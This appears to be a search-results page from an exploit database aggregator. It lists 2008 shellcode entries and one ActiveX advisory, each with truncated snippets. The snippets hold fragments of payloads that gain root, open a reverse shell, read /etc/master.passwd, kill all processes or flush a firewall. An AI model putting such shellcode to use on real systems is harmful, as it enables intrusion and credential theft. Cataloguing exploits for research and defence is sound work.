Lucene search
+L

3624 matches found

0day.today
0day.today
added 2008/09/29 12:0 a.m.20 views

linux/x86 setresuid(0,0,0) /bin/sh shellcode 35 bytes

Exploit for linux/x86 platform in category shellcode ===================================================== linux/x86 setresuid0,0,0 /bin/sh shellcode 35 bytes ===================================================== ========================================================== linux x86...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2008/09/17 12:0 a.m.27 views

linux/x86 - iopl3; asmcli; while1{} 12 bytes

linux/x86 iopl3; asmcli; while1 12 bytes. Shellcode exploit for linx86 platform / :::::::-. ... ::::::. :::. ;;, ';, ;; ;;;;;;;, ;;; ' . ' $$, $$$$ $$$ $$$ "Y$c$$ 888,o8P'88 .d888 888 Y88 MMMMP" "YmmMMMM"" MMM YM dunatstrcpy.pl linux/x86 iopl3; asm"cli"; while1 12 bytes iopl3; asm"cli"; while1 //...

0.2AI score
SaveExploits0
seebug.org
seebug.org
added 2008/09/10 12:0 a.m.27 views

freebsd/x86 kill all processes 12 bytes

No description provided by source. CoDed bY suN8Hclf DaRk-CodeRs Group productions, kid FreeBSD x86 kill all procesess 12 bytes shellcode Compile: nasm -f elf code.asm ld -e start -o code code.o Assembly code: ---------------------code.asm------------------- section .text global start start: xor...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2008/09/10 12:0 a.m.22 views

win32 PEB Kernel32.dll ImageBase Finder (Ascii Printable) 49 bytes

No description provided by source. / PEB Kernel32.dll ImageBase Finder Ascii Printable Author: Koshi Description: Uses PEB method to locate the ImageBase of Kernel32.dll ONLY supports NT/2K/XP.. sorry no 9X. ImageBase will be returned in EAX. No null bytes, obviously, so no need to encode really...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2008/09/10 12:0 a.m.27 views

win32 PEB Kernel32.dll ImageBase Finder Alphanumeric 67 bytes

No description provided by source. / PEB Kernel32.dll ImageBase Finder Alphanumeric Author: Koshi Description: Uses PEB method to locate the ImageBase of Kernel32.dll ONLY supports NT/2K/XP.. sorry no 9X. ImageBase will be returned in EAX. No null bytes, obviously, so no need to encode really...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2008/09/09 12:0 a.m.50 views

freebsd/x86 - kill all processes 12 bytes

freebsd/x86 kill all processes 12 bytes. Shellcode exploit for freebsdx86 platform CoDed bY suN8Hclf DaRk-CodeRs Group productions, kid FreeBSD x86 kill all procesess 12 bytes shellcode Compile: nasm -f elf code.asm ld -e start -o code code.o Assembly code:...

7.4AI score
SaveExploits0
0day.today
0day.today
added 2008/09/09 12:0 a.m.17 views

linux/x86 system-beep shellcode 45 bytes

Exploit for linux/x86 platform in category shellcode ======================================== linux/x86 system-beep shellcode 45 bytes ======================================== / By Thomas Rinsma 16 apr. 2008 Shellcode makes system speaker beep once, 45 bytes: ; int fd = open"/dev/tty10", ORDONLY;...

7AI score
SaveExploits0
0day.today
0day.today
added 2008/09/09 12:0 a.m.24 views

freebsd/x86 kill all processes 12 bytes

Exploit for freebsd/x86 platform in category shellcode ======================================= freebsd/x86 kill all processes 12 bytes ======================================= CoDed bY suN8Hclf DaRk-CodeRs Group productions, kid FreeBSD x86 kill all procesess 12 bytes shellcode Compile: nasm -f el...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2008/09/08 12:0 a.m.24 views

Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (2)

source: https://www.securityfocus.com/bid/31069/info Microsoft Windows Image Acquisition Logger ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. The issue occurs because the control fails to sanitize user-supplied input. ...

9.3CVSS5.8AI score0.17761EPSS
SaveExploits3
Exploit DB
Exploit DB
added 2008/09/03 12:0 a.m.30 views

win32 PEB Kernel32.dll ImageBase Finder Alphanumeric 67 bytes

win32 PEB Kernel32.dll ImageBase Finder Alphanumeric 67 bytes. Shellcode exploit for win32 platform / PEB Kernel32.dll ImageBase Finder Alphanumeric Author: Koshi Description: Uses PEB method to locate the ImageBase of Kernel32.dll ONLY supports NT/2K/XP.. sorry no 9X. ImageBase will be returned ...

0.3AI score
SaveExploits0
0day.today
0day.today
added 2008/09/03 12:0 a.m.24 views

win32 PEB Kernel32.dll ImageBase Finder (Ascii Printable) 49 bytes

Exploit for win32 platform in category shellcode ================================================================== win32 PEB Kernel32.dll ImageBase Finder Ascii Printable 49 bytes ================================================================== / PEB Kernel32.dll ImageBase Finder Ascii Printab...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2008/08/26 12:0 a.m.25 views

freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes

No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2008/08/25 12:0 a.m.30 views

freebsd/x86 - /bin/cat /etc/master.passwd NULL free 65 bytes

freebsd/x86 /bin/cat /etc/master.passwd NULL free 65 bytes. Shellcode exploit for freebsdx86 platform ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jm...

0.2AI score
SaveExploits0
0day.today
0day.today
added 2008/08/25 12:0 a.m.30 views

freebsd/x86 /bin/cat /etc/master.passwd (NULL free) 65 bytes

Exploit for freebsd/x86 platform in category shellcode ============================================================ freebsd/x86 /bin/cat /etc/master.passwd NULL free 65 bytes ============================================================ ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBS...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2008/08/22 12:0 a.m.20 views

freebsd/x86 encrypted shellcode /bin/sh 48 bytes

No description provided by source. / Encoded SUB shellcode execve /bin/sh of 48 bytes by [email protected] c0d3z3r0 Hack 'n Roll / char shellcode = "\x31\xd2" "\xeb\x0e" "\x31\xdb" "\x5b" "\xb1\x19" "\x83\x2c\x1a\x01" "\x42" "\xe2\xf9" "\xeb\x05" "\xe8\xed\xff\xff\xff" "\x32\xc1"...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2008/08/22 12:0 a.m.19 views

freebsd/x86 setuid(0); execve(ipf -Fa); shellcode 56 bytes

No description provided by source. ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 56 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax ;0 mov al, 0x17 int 0x80 ; --------------------- -Faa xor eax,...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2008/08/21 12:0 a.m.28 views

freebsd/x86 - reverse portbind /bin/sh 89 bytes

freebsd/x86 reverse portbind /bin/sh 89 bytes. Shellcode exploit for freebsdx86 platform ; sm4x - 2008 ; reverse portbind /bin/sh ; NULL free if address is. ; setuid0; socket; connect; exit; ; 89 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al,...

SaveExploits0
Exploit DB
Exploit DB
added 2008/08/21 12:0 a.m.26 views

freebsd/x86 - setuid0; execveipf -Fa; shellcode 57 bytes

freebsd/x86 setuid0; execveipf -Fa; shellcode 57 bytes. Shellcode exploit for freebsdx86 platform ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 57 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax...

0.4AI score
SaveExploits0
0day.today
0day.today
added 2008/08/21 12:0 a.m.15 views

freebsd/x86 reverse portbind /bin/sh 89 bytes

Exploit for freebsd/x86 platform in category shellcode ============================================= freebsd/x86 reverse portbind /bin/sh 89 bytes ============================================= ; sm4x - 2008 ; reverse portbind /bin/sh ; NULL free if address is. ; setuid0; socket; connect; exit; ; ...

7AI score
SaveExploits0
0day.today
0day.today
added 2008/08/19 12:0 a.m.17 views

freebsd/x86 encrypted shellcode /bin/sh 48 bytes

Exploit for freebsd/x86 platform in category shellcode ================================================ freebsd/x86 encrypted shellcode /bin/sh 48 bytes ================================================ / Encoded SUB shellcode execve /bin/sh of 48 bytes by email protected Hack 'n Roll / char...

7AI score
SaveExploits0
Rows per page
Query Builder